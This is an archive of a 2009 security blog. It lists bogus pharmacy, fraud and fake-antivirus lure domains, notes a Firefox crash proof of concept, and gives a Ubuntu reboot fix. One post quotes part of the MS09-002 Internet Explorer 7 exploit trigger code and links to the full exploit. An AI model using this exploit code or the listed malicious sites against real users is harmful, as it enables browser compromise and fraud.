Tuesday, March 31, 2009

Bogus Pharmaceutic and Security Websites spreads #2

When discussing about bogus pharmaceutic, it really make people sick about it. These websites keep growing from day to days. However, to make people around to increase their awareness about it. I will continuing posting regarding these bogus websites.







Websites:

Websites that share same IP address: 220.248.186.101

achyatqq.vetijevuj.cn
awakehappy.com
awzppa.rembasem.cn
bafwajex.cn
bambiqic.cn
bamvudar.cn
barhoqeq.cn
bavxataw.cn
bedfumiw.cn
belcowax.cn
belpipaf.cn
beqtodow.cn
betkawij.cn
bevcotop.cn
bevyakiv.cn
biiyfvc.laqheyis.cn
bipyifak.cn
biqejeyer.cn
bixtakaj.cn
bobtakam.cn
bofkapoj.cn
bohnukes.cn
boqjehaw.cn
borsoxeq.cn
buctilon.cn
bupmocew.cn
burgatok.cn
caggojeb.cn
cakxevex.cn
catchaspiration.com
cavxolun.cn
cecajiqod.cn
cegtumih.cn
centiliw.cn
ceqwaqim.cn
cijqifon.cn
ciqxemex.cn
citcired.cn
cleanrosy.com
cohcadep.cn
cojjirun.cn
colpeh.sirpibis.cn
comvuyoy.cn
coolgave.com
coqlepig.cn
cubjipuz.cn
cudwedun.cn
cuyfesap.cn
cuyrodew.cn
dapbukat.cn
dayxikif.cn
dazsipal.cn
dehowabof.cn
dibxucuh.cn
dihwusav.cn
dikrisew.cn
dimvijiw.cn
ditguwor.cn
diwruxam.cn
diymeveg.cn
dizfudow.cn
docguruj.cn
dogkujuf.cn
domsiwes.cn
donwohup.cn
dudrexac.cn
duwkiwug.cn
dyeiqt.hujzibur.cn
egcjtzoxl.comagitix.cn
ejoew.cn
ekatfhv.laqheyis.cn
emjrowe.cn
evmjoier.cn
fammuvey.cn
fanbihad.cn
fefxohid.cn
fenvujum.cn
feqdaxay.cn
feqlulup.cn
fergicog.cn
ferkogec.cn
fhy.higukijas.cn
fhykg.higukijas.cn
ficcuwah.cn
fiflipag.cn
filcuqiq.cn
filgiwuq.cn
fivpapad.cn
fotjaqow.cn
foxabavem.cn
freshzeal.com
fsswisk.wawlafey.cn
fubdebiq.cn
fuptumey.cn
fuvzucuf.cn
gactodut.cn
gagyayub.cn
gaknaruy.cn
gawdazad.cn
gayyajov.cn
genviwoz.cn
gimkeyeh.cn
giqukedob.cn
givjivon.cn
givlajig.cn
gkbocu.xuymulos.cn
gobnezun.cn
gocgudim.cn
gocnoyuf.cn
gohvagos.cn
gojqigex.cn
gorgeousachieving.com
goszupuj.cn
gtai.higukijas.cn
gubwuxot.cn
guqxaqal.cn
gusfarux.cn
gzwcsoo.gactodut.cn
haqneleb.cn
havyaxuj.cn
hcqg.vuxihodej.cn
hejvevaz.cn
hfezrte.zivzifem.cn
hickotun.cn
hijbumuh.cn
himcuneh.cn
hitbumek.cn
hnp.yohwabim.cn
hobfekex.cn
hosta.vetijevuj.cn
hotwideg.cn
hudgilor.cn
humdaneg.cn
hykru.xasmijid.cn
iiqbgw.xasmijid.cn
independencesuit.com
jabzofiw.cn
jadxexux.cn
jafgexoh.cn
jaypogeh.cn
jcu.vetijevuj.cn
jedmomiw.cn
jegnorey.cn
jeyjoxej.cn
jezhudik.cn
jicnubol.cn
jicyibiz.cn
jinforuy.cn
jiwlexix.cn
jlunjjgdt.lajehahuh.cn
jodgifil.cn
jotwuxuv.cn
jujfisim.cn
jujvutuz.cn
jurmuyit.cn
jutbacik.cn
juvxedan.cn
juybuwoz.cn
kaltuxid.cn
kavxadir.cn
kebwivav.cn
kefvaweq.cn
kefvuhuy.cn
kifgodor.cn
kodmafah.cn
konpafus.cn
koqvoluv.cn
kubfuqup.cn
kuhkupit.cn
kuwvasiz.cn
kuykepic.cn
laczowin.cn
lakpemax.cn
larniqos.cn
laswakan.cn
lavloneq.cn
laxwedoh.cn
legacycourse.com
legsatih.cn
legvaqoq.cn
lemnudal.cn
liggepuk.cn
lijzarej.cn
linpaton.cn
linpefan.cn
liyxozed.cn
liznozot.cn
lojnosum.cn
lojvawar.cn
lokzihas.cn
loxlivah.cn
lqqfdv.xetgawaf.cn
lrhgtflv.vetijevuj.cn
lrlw.rembasem.cn
lubciwaf.cn
lunwupiv.cn
lunyicep.cn
madjuneb.cn
maknohod.cn
mamnijun.cn
marriziy.cn
maxdokuy.cn
meekreap.com
meyxuwey.cn
mipzetih.cn
mujyudit.cn
mukkebes.cn
mumjujeq.cn
mutwomix.cn
muxcilol.cn
muxqovuz.cn
nabnixom.cn
nadpagex.cn
nagjabaz.cn
namceduf.cn
navloceb.cn
needaglow.com
negfozer.cn
nemriwop.cn
netzepux.cn
nibnupel.cn
nijmofer.cn
nijzirem.cn
nimjahoy.cn
ninesing.com
ninmojop.cn
nisimuves.cn
niwbifut.cn
nohvoxez.cn
noqhafef.cn
nucwobit.cn
nugiluheq.cn
numzediq.cn
nupnivak.cn
nuvfiwil.cn
nuvmotuq.cn
nuwmuxof.cn
ofhzk.vuxihodej.cn
onlywash.com
otf.devgalif.cn
oujql.vaxakadiy.cn
ovbhv.pilpuweg.cn
pabfakom.cn
parhopun.cn
pavlegif.cn
pecculeh.cn
pegbural.cn
pelfufin.cn
pempolus.cn
pepxobiq.cn
peqpejik.cn
pettuyex.cn
picdamuh.cn
pijgaquv.cn
pijridik.cn
pijtuboh.cn
pilpuweg.cn
pimdojab.cn
pipposik.cn
plumgrand.com
pmfgradxk.vuxihodej.cn
pmtcqk.gixpekuv.cn
pocnosev.cn
pokov.com
popos.hekfujig.cn
poqfehan.cn
porajelep.cn
prjcmxsgc.barhedaq.cn
pufcebep.cn
puggemug.cn
purhovep.cn
puvlizur.cn
qacgivav.cn
qadpucal.cn
qamhamef.cn
qancabeb.cn
qawmegaf.cn
qawpowaj.cn
qevtokun.cn
qewnojid.cn
qexzy.gixxukub.cn
qeynafak.cn
qifbapih.cn
qigzebel.cn
qijyrs.lesdugil.cn
qokobebuz.cn
qolnusal.cn
qorfiyin.cn
qowpudoz.cn
qoyluzam.cn
qoysoduy.cn
qoytuteb.cn
quartmeat.com
qugheyub.cn
quhmirir.cn
qutgagej.cn
rakbeqag.cn
ralpikum.cn
ranfukuy.cn
rbhaypg.sidnehog.cn
redtecoz.cn
refzamor.cn
regjequr.cn
rersiver.cn
retjajej.cn
rihqabuy.cn
rimgogum.cn
rimwusoh.cn
risgoxol.cn
rixlupur.cn
rohhozin.cn
rohxosim.cn
rosyslick.com
rozzicay.cn
rujfurif.cn
rujhewah.cn
rurkonev.cn
sahtoqad.cn
satzaziq.cn
sazjozez.cn
sehxuyod.cn
sellalus.cn
senezavak.cn
senkoqud.cn
senseswim.com
sethucej.cn
sewyadix.cn
sigdalis.cn
siqcatar.cn
sisfejur.cn
soryorob.cn
sovqztpt.yetuvofaw.cn
sovvutuj.cn
sowvedes.cn
spam.duxloyen.cn
spam.vogvuper.cn
support.vugocedog.cn
suqsefon.cn
tagjetev.cn
tavjisec.cn
teccebon.cn
tehdivax.cn
teqwopus.cn
tifvicif.cn
tikbacoh.cn
tizgowuc.cn
tocfuden.cn
tofucahiw.cn
toqdaluv.cn
toqotayuw.cn
toyhecox.cn
tubzanut.cn
tujkumiy.cn
tukqocob.cn
tulwucak.cn
tuqyeraz.cn
turbeyel.cn
tuvduxup.cn
tuvsatud.cn
uck.kiclidoh.cn
uzhsuhgf.hovjufeq.cn
vabqetab.cn
vajdigid.cn
vawbalop.cn
vecjoquw.cn
veckigan.cn
vemawwo.cn
vemjoew.cn
vepmoheb.cn
vevqeloq.cn
vihroseq.cn
viqnijac.cn
vitzuliv.cn
viyhaxob.cn
vogbofay.cn
vorcapey.cn
vucrejad.cn
vucxugoh.cn
vudhusux.cn
vuhgorul.cn
vuksupar.cn
wagxevux.cn
wahkekiw.cn
wajwamer.cn
walkminute.com
wasvupip.cn
wavgulit.cn
waxpowos.cn
waxyutag.cn
wefbebag.cn
wensugid.cn
weytuzoh.cn
whizneed.com
widdiqec.cn
wihcolav.cn
winnakok.cn
wipqepeq.cn
wodfanot.cn
wouldhealth.com
wpq.wawlafey.cn
wuknolur.cn
wulhateh.cn
wuphaxus.cn
wupnezan.cn
wuxgikil.cn
xamkizey.cn
xapciwam.cn
xaspijof.cn
xekkubeh.cn
xepfibiw.cn
xerpopuk.cn
xezfanow.cn
xezqawiy.cn
xidseruk.cn
xighasux.cn
xijdaqow.cn
xivzoquk.cn
xmvjo.cn
xobqezit.cn
xogtuleq.cn
xolkizom.cn
xopmivaq.cn
xoqfacil.cn
xotfesup.cn
xowgekuy.cn
xudgehiv.cn
xuqjoyav.cn
xuvqoquv.cn
xynehdt.xunxijej.cn
yecgajik.cn
yijjenij.cn
yipnugil.cn
yohwabim.cn
yovcoteg.cn
ytjmkyn.laqheyis.cn
ytuajfki.emhwvw.cn
yudlifud.cn
yujhaqod.cn
yumvicel.cn
yustedez.cn
yuznedij.cn
zahowbo.werkaged.cn
zatjegam.cn
zatniges.cn
zedduson.cn
zedhehad.cn
zedlibit.cn
zelfagam.cn
zephepuj.cn
zerxiviz.cn
ziffubeq.cn
zimnogef.cn
zirgusev.cn
zivyumuq.cn
zixerofov.cn
zocwiden.cn
zotxucum.cn
zoxdijeh.cn
zpef.sirpibis.cn
zugxawaq.cn

Websites that share same IP address: 58.20.140.5

bakvubar.cn
baplozih.cn
bayvedap.cn
bebxomaj.cn
behzeyig.cn
bidseruy.cn
biiyfvc.laqheyis.cn
bikviyay.cn
broughtmusic.com
bundoqaq.cn
cadyaxiy.cn
cafqubuq.cn
celxihir.cn
cesqired.cn
cetsiros.cn
cocneguy.cn
colketif.cn
colpeh.sirpibis.cn
dakgekak.cn
debyuwan.cn
deccaqal.cn
decideintuition.com
decmudoc.cn
deffuler.cn
deqdexir.cn
detratob.cn
dezdubos.cn
dibruqiv.cn
dikwiqim.cn
dipzapel.cn
doczewiy.cn
dolpuvir.cn
doslituv.cn
dotpufey.cn
dovrirur.cn
dufputap.cn
duknacok.cn
duwriric.cn
duymeziz.cn
fafkufex.cn
favaroc.cn
fawfikut.cn
fesriyul.cn
fetcijor.cn
fevtamen.cn
ficfumiw.cn
filfuvep.cn
firhisoh.cn
fixvesih.cn
fiyxuqix.cn
fokyivir.cn
forqimav.cn
fulravat.cn
fungiwaw.cn
futnanuk.cn
fuzlivuz.cn
gamyidus.cn
gapxocih.cn
gaqgamad.cn
gatboden.cn
getkosem.cn
geycujiz.cn
gilwumuf.cn
gimsevax.cn
gipcijik.cn
gombanaq.cn
govyisan.cn
goxcofaf.cn
gubsicey.cn
guflipun.cn
gufnijiz.cn
gugsarin.cn
gujqibey.cn
gulpomag.cn
gusbuhif.cn
guzmuhec.cn
hacyojey.cn
hafzixow.cn
hajtiron.cn
hamunv.colhemix.cn
havserak.cn
hebnadit.cn
hefbuswd.cn
hejgumeb.cn
hemnadaq.cn
hewhexav.cn
hicxafuw.cn
hidzabot.cn
hijboyas.cn
hivkejit.cn
hogjuxam.cn
homlunot.cn
hudvafux.cn
husvufis.cn
jabzihev.cn
jaflevoq.cn
jakkosut.cn
jamhagaq.cn
javyecik.cn
jecbuduj.cn
jeklugef.cn
jihpupaw.cn
jilredoy.cn
jirtusik.cn
jokjivot.cn
jovpigan.cn
jovpimod.cn
joyzexiv.cn
junxoguk.cn
juwnejod.cn
kabmedek.cn
kahjiqud.cn
kalcakej.cn
kaqkukar.cn
kaqqijiw.cn
kazwebix.cn
kegvugij.cn
ketcisil.cn
kezyujom.cn
kijwahok.cn
kirgenas.cn
kivgozoj.cn
kohradek.cn
kombejih.cn
kujbivak.cn
kumburuj.cn
kunjipek.cn
kuydubax.cn
ladqesev.cn
lagmatud.cn
lamqofas.cn
lazgocig.cn
legsatih.cn
lelgovob.cn
levderoq.cn
levjipaz.cn
levmukog.cn
leygiyum.cn
lezkeciy.cn
libguvul.cn
libnidah.cn
lidkefuz.cn
lixrital.cn
locsiliz.cn
lusgosig.cn
luxvayij.cn
maczeguc.cn
mahyobas.cn
majbujaq.cn
maymewep.cn
metlajiw.cn
mewdecam.cn
mitcizuj.cn
modfuwuz.cn
momqudoy.cn
moscivux.cn
movdaguv.cn
mugvegep.cn
muncataz.cn
murficah.cn
muwzenel.cn
muylopah.cn
nahyekuv.cn
narwuxag.cn
nedxeviy.cn
neypitab.cn
ninmucoz.cn
nizmiqew.cn
nomrojip.cn
nubqibuv.cn
nugzoweh.cn
nukdijiq.cn
pabjiqek.cn
pagwibir.cn
paplajoc.cn
papzonef.cn
pavbehax.cn
pazqafeh.cn
pempapub.cn
pemvozet.cn
pillexic.cn
piqjigen.cn
piqtobaj.cn
pogqonoj.cn
polsiqup.cn
potrimid.cn
pubnawag.cn
pulpokew.cn
pumtuneh.cn
puqfudoc.cn
qadpucal.cn
qaxnakan.cn
qedhicob.cn
qesgemav.cn
qetpatox.cn
qewzesis.cn
qighabok.cn
qihgakon.cn
qiwyuqor.cn
qixwafac.cn
qoytuteb.cn
quckezic.cn
qufjiqaq.cn
qukculat.cn
qukdowap.cn
qumziwus.cn
quzcihat.cn
ragjebum.cn
rahlocew.cn
rakterij.cn
ralvobig.cn
rarhiviz.cn
rawwisep.cn
razdukix.cn
rbhaypg.sidnehog.cn
rerborat.cn
reyxasow.cn
riddovuf.cn
roctihix.cn
rodfuruy.cn
rovjisek.cn
roxjiwuh.cn
roysinut.cn
rudrozet.cn
rujcujoz.cn
sapxedun.cn
satxutup.cn
saxferos.cn
sazjapoj.cn
secbitus.cn
sejmobux.cn
sidsutud.cn
sikrefez.cn
sodzeduw.cn
sojx.cesqired.cn
sotkogek.cn
spam.vegmesut.cn
sumvezoh.cn
supwuvof.cn
suxxegup.cn
suztufet.cn
tadquvem.cn
tajxeqab.cn
tanbezat.cn
tasgevac.cn
tawcohud.cn
ticxibep.cn
tidbeher.cn
tiymemak.cn
tojbamep.cn
tolqaram.cn
totmimez.cn
tovsejoc.cn
toyyalic.cn
tublalul.cn
tucyefaj.cn
tudhixek.cn
tunyoqon.cn
turke.jifyosek.cn
utxarsr.fergicog.cn
vajdigid.cn
vamfiwiq.cn
vegyunij.cn
vehhuyig.cn
vergojax.cn
vivdeniw.cn
vivnoyij.cn
vivpufup.cn
vokkudas.cn
voqxavuz.cn
votzutuv.cn
vubhewad.cn
vufquyot.cn
vuhsehuq.cn
vumxabet.cn
vuxjuhoj.cn
vuzfoqew.cn
warmcase.com
wasvupip.cn
waszocun.cn
wavfalah.cn
wesrekoj.cn
wexvebag.cn
wihniger.cn
wivhudob.cn
wivvolat.cn
wodbefid.cn
wohsodez.cn
wongumar.cn
wonvufef.cn
worpopod.cn
wotdepow.cn
wqf.xetgawaf.cn
wuswutav.cn
xaktukap.cn
xatvemow.cn
xaxjahat.cn
xazfesez.cn
xazlituh.cn
xefhifuq.cn
xetlijir.cn
xijmacur.cn
xohrx.kiclidoh.cn
xoldijej.cn
xoycewad.cn
xozriniq.cn
xughurow.cn
xuqfilac.cn
yactujel.cn
yatanow.cn
yavjijob.cn
ybgexx.hilhazin.cn
yemdazon.cn
yessacij.cn
yexwogum.cn
yeymihuf.cn
yezcelux.cn
yosgajiq.cn
yugmibap.cn
zabfepih.cn
zajfavil.cn
zakvuwab.cn
zallokix.cn
zansigef.cn
zarjurib.cn
zecqopes.cn
zegyukep.cn
zelrehop.cn
zerkogak.cn
zeyvukel.cn
zinvifoq.cn
zojyirod.cn
zonjifat.cn
zonxutoy.cn
zuhkacez.cn
zusfeyed.cn

Websites that share same IP address:60.191.221.135

baqapegoy.cn
fqictvz.vetijevuj.cn
roksotaf.cn
support.hujzibur.cn

Thursday, March 26, 2009

Firefox 0-Day -Memory Heap crash PoC

Latest Firefox crashed PoC released on 25-March-09 from milw0rm. This PoC was tested and works on Windows and Linux platforms.



Figure 1: xmlcrash.html



Figure 2: xmlcrash.xml


Figure 3: xslt.xls

Reference:
http://milw0rm.com/sploits/2009-ffox-poc.tar.gz

Tuesday, March 24, 2009

Online Fraud actives in Healthy, Sex, and Counterfeit goods

Peoples around me keep complaining that lots of the fake or fraud URL links suddenly pop up in their instant messaging box when chatting with other people online. I advised them don't ever click on these website, it could cause harm on your system when load the suspicious webpages. These usually happens on few famous Instant Messenger available within Internet World.

These fraud not only limited to counterfeit goods, but also include others like drugs, loans, false claims, healthy and sex...My advice is don't ever disclose your personal information, credit cards to these website although contains third party famous online privacy logo such as Verisign, Truste and others.

Samples images that captured.



Image 1: Healthy drug


Image 2: Counterfeit goods (rolex watch)


Image 3: Drug to improve sex satisfaction

Below are the few domain websites that contain possible fraud activities...

  • okaytext.com
  • packwait.com
  • partpint.com
  • sizelong.com
  • testgot.com
  • testthen.com
  • tickteal.com
  • verycomes.com
  • waitcome.com
  • wavepeel.com
  • wentdone.com
  • www.feelfill.com
  • www.gistlaid.com
  • www.okaypage.com
  • www.okaytext.com
  • www.sizelong.com
  • www.textfame.com
  • www.verycomes.com
  • aleachean.com
  • backsear.com
  • bothhide.com
  • cheapqualitymeds.com
  • costthe.com
  • dualnary.com
  • edjl.tickteal.com
  • favebase.com
  • feelbid.com
  • feeldual.com
  • feelfill.com
  • gistlaid.com
  • givepace.com
  • lasthigh.com
  • losemake.com
  • mainthat.com
  • maylit.com
  • maymap.com
  • millchat.com

Thursday, March 12, 2009

Enticing to download fake antivirus through popular celebrity video !

Recently, few of sites registered in blogspot detected as malicious link to trick users to view popular celebrity sex movies by downloading their decoder. Malicious website will prompt a message dialog mentioned that users computer were infected by viruses, and fake antivirus 'InstallAVg_881050.exe' will be downloaded and installed in user computer. Rouge antivirus rename by using AVG antivirus vendor name to foolish users and believe its from true website.

Below is the bad links that hosted in blogspot.

  • h xxp://lisa-bonet-angel-heart.blogspot.com
  • h xxp://milla-jovovich-gallery.blogspot.com
  • h xxp://pamela-anderson-hot-sex-tape.blogspot.com
  • h xxp://rihanna-nude-gallery.blogspot.com
  • h xxp://kate-hudson-nude-gallery.blogspot.com
  • h xxp://teacher-slept-with-boy.blogspot.com
  • h xxp://meg-white-new-sex-tape.blogspot.com
  • h xxp://anna-faris-hot-video.blogspot.com
  • h xxp://so-hard-movies.blogspot.com
  • h xxp://vanessa-hot.blogspot.com
  • h xxp://paris-hilton-sexass.blogspot.com
  • h xxp://sex-tape-lindsay-lohan.blogspot.com
  • h xxp://chloesevigny-privategallery.blogspot.com
  • h xxp://kate-winslet-nude-gallery.blogspot.com
  • h xxp://keeley-hazell-sex-hot-video.blogspot.com
  • h xxp://miley-cyrus-sex-tape.blogspot.com
  • h xxp://britney-spears-ho xxest-video.blogspot.com
  • h xxp://miley-cyrus-naked-video.blogspot.com
  • h xxp://alyssa-milano-naked-video.blogspot.com
  • h xxp://kardashian-hot-video.blogspot.com
  • h xxp://naked-jennifer-lopez.blogspot.com
  • h xxp://vanessa-hudgens-hot-video.blogspot.com
  • h xxp://ho xxest-lindsay-lohan-video.blogspot.com
  • h xxp://cameron-diaz-porn.blogspot.com
  • h xxp://underworld-rise-lycans.blogspot.com


Figure 1: Trick users to download the encoder to view the video



Figure 2: Trick users that computer were infected by viruses


Figure 3: Scanning in process using fake images



Figure 4: Viruses were detected and fake antivirus has been download automatically



Figure 5: md5 for the fake executable exe file

Wednesday, March 4, 2009

MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) in Python

Yo..Ahmed Obied posted script for MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) in Python. The full coding can be obtained from http://www.milw0rm.com/exploits/8152
.......
         function trigger_bug()
{
var obj = document.createElement("table");
obj.click;
var obj_cp = obj.cloneNode();
obj.clearAttributes();
obj = null;

CollectGarbage();
var img = document.createElement("img");
img.src = unescape("%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC");

obj_cp.click;
}
.......continued

Sunday, March 1, 2009

Unable to reboot for Ubuntu 8.04 (x86) - Hardy Heron in x86_64 systems

Hi guys,

Do you encounter problem that unable to reboot after your Ubuntu 8.04 (x86) installed in hardware systems that support (x86_64) ?
Below is the minor used to tweak and resolve this problem.

# cd /boot/grub/
# sudo vim menu.lst

add reboot=b end of the line kernel

Example:
kernel /boot/vmlinuz-2.6.24-xx-generic root=UUID-xxxxxxxx-54xx-4xxx-bxxx-1xxxxxxx ro quiet splash reboot=b

Save menu.lst after make changes, reboot system to make sure it works.